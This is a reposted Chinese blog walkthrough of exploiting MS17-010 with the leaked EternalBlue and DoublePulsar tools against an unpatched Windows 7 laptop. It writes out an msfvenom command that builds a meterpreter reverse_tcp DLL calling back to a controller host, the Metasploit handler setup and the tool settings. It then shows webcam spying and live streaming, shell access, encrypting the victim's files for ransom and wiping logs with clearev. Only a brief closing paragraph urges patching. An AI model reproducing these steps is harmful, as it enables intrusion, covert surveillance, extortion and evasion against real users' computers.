感谢原作者:http://www.cnblogs.com/cnbluerain/
 
        好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷的用,也可以,可是,你不能泄露出来啊,我们要感谢伟大的组织Shadow Brokers(影子经纪人)多酷炫的名字,有木有很文艺的感觉,感谢他让我们小屁民也用用NSA的工具,O(∩_∩)O哈哈哈~,2016 年 8 月Shadow Brokers入侵了方程式组织(Equation Group是NSA下属的黑客组织)窃取了大量机密文件,并将部分文件公开到了互联网上,这部分被公开的文件包括不少隐蔽的地下的黑客工具。另外Shadow Brokers还保留了部分文件,打算以公开拍卖的形式出售给出价最高的竞价者,预期的价格是 100 万比特币(价值接近5亿美元)。Shadow Brokers的工具一直没卖出去……(是不是很糗),一怒之下哈哈,把工具免费的放出来了,EternalBlue就是这样被公开了,后来就有了利用公布的这个漏洞四处横行的WannaCry。四处找寻,找到了这些工具,完了来实验下,哎,不亏是NSA御用的,老好用了。其实人家工具包里有特别牛的攻击负载,但是那东西来路不正,没敢用,所以只用工具包里面的EternalBlue还有就是Doublepulsa,EternalBlue这个工具就是利用windows系统的Windows SMB 远程执行代码漏洞向Microsoft 服务器消息块 (SMBv1) 服务器发送经特殊设计的消息,就能允许远程代码执行。没有使用现成的攻击载荷,而是用MSF生成一个攻击载荷,用Doublepulsa注入到EternalBlue攻击的系统上。
    需要三台电脑 

    一台windows7 正版 sp1(没有更新到最新的补丁),ip:192.168.1.179,什么都不需要做,开机,知道IP就可以了
    就是这个倒霉蛋我的笔记本(用了7年了)

一台用来运行攻击程序,注入dll的,因为EternalBlue需要python2.6.6,32位,以及pywin32-221,32位版本,所以攻击的电脑需要时32位的,我用的是一台windowsXP   ip地址192.168.1.180

还需要一台电脑 这个是控制端,用来控制被入侵的电脑,linux系统,这个还有个功能就是使用msf生成攻击负载,msf是什么就不说了,攻击入侵,杀人越货之必备良品。

首先我们要利用msfvenom生成一个负载,就是一个木马了,帮我们干活的东西,我要在64位的电脑上运行木马,所以生成木马的命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=5555 -f dll > /root/dll/systemSet.dll
三个地方 一个就是控制端的地址,一个是使用的端口,一个是生成文件的存放位置。哦 还有就是 模块,用于64位的windows

生成后,将dll文件拷贝到攻击用电脑上完了就是利用EternalBlue攻击受害系统,成功后使用Doublepulsa将刚刚生成的木马,远程,人不知,鬼不觉的注入到受害系统上去,从控制机上控制受害机。

接着在msf下开启msfpaylod监听等着被控制端上线。
$ msfconsole,开启msfconsole,看看这是不是很帅,很帅

接下来设置开启监听 
msf > useexploit/multi/handler
msf > set LHOST 192.168.1.41
msf > set LPORT 5555
msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit
等着倒霉蛋上钩吧

接下来就是重头戏了,在安装好环境的攻击机上复制好NSA的超牛工具,执行windows目录下的fb.py,源文件要修改下,注释掉26、27、28、72四行。

需要设置的有攻击IP地址192.168.1.179(受害者),回调地址192.168.1.180(攻击机),关闭重定向,设置日志路径,新建或选择一个project其他都是默认值回车即可。

接下来输入命令开启永恒之蓝开始攻击:
use ETERNALBLUE
依次填入相关参数,超时时间等默认参数可以直接回车,需要注意的就是,选择被攻击方的操作系统目标系统信息,以及攻击模式选择FB

看到 这个 Eternalblue Succeeded,攻击完成

接下来开始使用Doublepulsar,把刚刚生成的木马注入到受害系统中去
use Doublepulsar

一路回车,需要注意的就是选择目标操作系统架构,系统后门的执行方式选择Rundll

填写刚刚生成的那个木马dll文件的地址

这个是填写你要注入的进程,默认是lsass.exe 默认就是最好的,直接回车

看到这个吗?Doublepulsar Succeeded ,已经成功把dll木马注入到受操控的系统中。攻击机的使命到此结束

返回到控制机,看看倒霉蛋已经上线了

再看看倒霉蛋,还是浑然不觉,很正常的在运行。

接下来,先用sysinfo看看倒霉蛋的信息,使用webcam_list 看看被控制的电脑有没有摄像头,routes查看路由表

这个screenshot,就是截取被控制端电脑的屏幕看看

这个就是截取到的图片

这个是打开被控制端的摄像头,拍一张图片

这个就是摄像头拍到的图片

下面这个就是开启摄像头直播,把摄像头拍摄的数据流传送回来,直接直播,哈哈哈

这个就是直播呢

shell,获取被控制系统的shell,就是像在你电脑上运行cmd一样,啥命令都可以执行,最高权限,被控制端上没有任何的提示。可以cmd rar 把被控制端上看着有用的文件给加密压缩了,哈哈,完了留个消息,给钱给密码,不给钱,你也打不开文件,哈哈 想哭 就是这么干的……

dir下被控制端的c盘有哪些文件

能做到很多呢,上传,下载文件,执行文件 等等等 没有做不到,只有想不到…… msf是不是很牛。
玩完了,记得清理掉痕迹,清理被控制端的日志
clearev

这个是不是很恐怖,所以,安全很重要,系统要用正版的,倒不至于去买正版,但是最起码要安装原版,完了各种办法去激活想正式版一样的享受升级,补丁……,万万不可用各种系统ghost,确实很快,很快,但是也很危险 很危险,想想这个远程控制你需要漏洞,需要好的攻击工具,很麻烦,如果把木马提前放到ghost映像里面,你安装直接就在系统了,直接控制根本不需要什么攻击和漏洞,看看这次大规模爆发,校园首当其冲,再有就是网络比较大的单位,一是他们是局域网,正中,还有一个原因就是他们的操作系统多数都是30块在大街上ghost的,或者小铺ghost的,微软早在3月14日就发布了ms17-010漏洞的补丁,ETERNALBLUE是在4月14日才释放出来,要不是wannacry大规模爆发,根本不会关注这个漏洞,不会去下载补丁。

[转载]关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用的更多相关文章

  1. 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用

            好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷 ...

  2. EternalBlue永恒之蓝漏洞复现

    EternalBlue漏洞复现 1.    实训目的 永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010.该漏洞利用工具由一个名为”影子经济人”( ...

  3. EternalBlue永恒之蓝渗透测试

    Eternal Blue(永恒之蓝)-ms17-010渗透测试 第一次做的渗透测试,也是第一次去写博客,还望各位师傅多多指正 :) 工具 1.靶机系统 window7 开放445以及139端口 2.k ...

  4. 永恒之蓝(MS17-010)检测与利用

    目录 利用Nmap检测 MSF反弹SHELL 注意 乱码 参考 利用Nmap检测 命令: nmap -p445 --script smb-vuln-ms17-010 [IP] # 如果运行报错,可以加 ...

  5. 永恒之蓝(EternalBlue)MS17-010

    附加知识: 漏洞来源与背景: 这个漏洞最初是由NSA(美国国家安全局)发现的,但是他们发现漏洞他不讲,然后遭殃了吧. 后来 有一个黑客组织叫:Shadow Brokers (影子经纪人) 入侵了NSA ...

  6. NSA永恒之蓝病毒,如何通过360工具修复?

    简介: NSA武器库的公开被称为是网络世界"核弹危机",其中有十款影响Windows个人用户的黑客工具,包括永恒之蓝.永恒王者.永恒浪漫.永恒协作.翡翠纤维.古怪地鼠.爱斯基摩卷. ...

  7. 勒索病毒 -- “永恒之蓝”NSA 武器免疫工具

    “永恒之蓝”NSA 武器免疫工具 针对 445 端口:445端口是一个毁誉参半的端口,他和139端口一起是IPC$入侵的主要通道.有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因 ...

  8. 永恒之蓝EternalBlue复现

    0x01 漏洞原理:http://blogs.360.cn/blog/nsa-eternalblue-smb/ 目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows ...

  9. 由"永恒之蓝"病毒而来的电脑科普知识

    永恒之蓝病毒事件: 继英国医院被攻击,随后在刚刚过去的5月12日晚上20点左右肆虐中国高校的WannaCry勒索事件,全国各地的高校学生纷纷反映,自己的电脑遭到病毒的攻击,文档被加密,壁纸遭到篡改,并 ...

  10. 由"永恒之蓝"病毒而来的电脑知识科普

    永恒之蓝病毒事件: 继英国医院被攻击,随后在刚刚过去的5月12日晚上20点左右肆虐中国高校的WannaCry勒索事件,全国各地的高校学生纷纷反映,自己的电脑遭到病毒的攻击,文档被加密,壁纸遭到篡改,并 ...

随机推荐

  1. YoloV5实战:手把手教物体检测

    摘要:​YOLOv5并不是一个单独的模型,而是一个模型家族,包括了YOLOv5s.YOLOv5m.YOLO... 本文分享自华为云社区<YoloV5实战:手把手教物体检测--YoloV5> ...

  2. 干货来了!阿里发布近300页Flink实战电子书

    近300页实用干货总结,帮你解决 Flink 实战应用难题!<Apache Flink电子书合辑>收录来自bilibili.美团点评.小米.OPPO.快手.Lyft.Netflix等一线大 ...

  3. A/B测试助力游戏业务增长

    更多技术交流.求职机会.试用福利,欢迎关注字节跳动数据平台微信公众号,回复[1]进入官方交流群 中国游戏行业发展现状及挑战 国内市场增长乏力 2021年游戏销售收入2965.13亿元,同比增长6.4% ...

  4. 信创就用国产的生态,Solon v2.6.4 发布

    Solon 是什么框架? Java 新的"生态级"应用开发框架.从零开始构建,有自己的标准规范与开放生态(历时六年,具备全球第二级别的生态规模). 相对于 Spring,有什么特点 ...

  5. RandomAccessFile 读写文件

    将目录下的N个日志文件读写到一个文件中. @Test void verification() throws Exception { File f = new File("D:\\Logs&q ...

  6. 利用GetPrivateProfileString相关函数读取配置文件(.ini)

    配置文件中经常用到ini文件,在VC中其函数分别为: 写入.ini文件: bool WritePrivateProfileString(LPCTSTR lpAppName,LPCTSTR lpKeyN ...

  7. AcWing 第 13 场周赛  补题记录

    比赛链接:Here AcWing 3811. 排列 签到题, 先输出 \(n\) 然后输出 \(1\sim n -1\) 即可 AcWing 3812. 机器人走迷宫 不会什么特别高级的方法 qaq, ...

  8. 【每日一题】7.月月查华华的手机 (枚举 or 序列自动机)

    题目链接:Here 题意总结:\(N\) 次查询串 \(B\) 是否是 \(A\) 的子序列. 思路一 个人做法,枚举原字符串的每一位,如果匹配当前字符串的字符则 m++ 直到字符串枚举完毕或者 m ...

  9. Android 原生 SQLite 数据库的一次封装实践

    本文首发于 vivo互联网技术 微信公众号 链接:https://mp.weixin.qq.com/s/CL4MsQEsrWS8n7lhXCOQ_g作者:Li Bingyan 本文主要讲述原生SQLi ...

  10. 云原生 Serverless Database 使用体验

    作者 | 李欣 近十年来互联网技术得到了飞速的发展,越来越多的行业加入到了互联网的矩阵,由此带来了更为丰富且复杂的业务场景需求,这对于数据应用系统的性能无疑是巨大的挑战.​ 关系型数据库 MySQL ...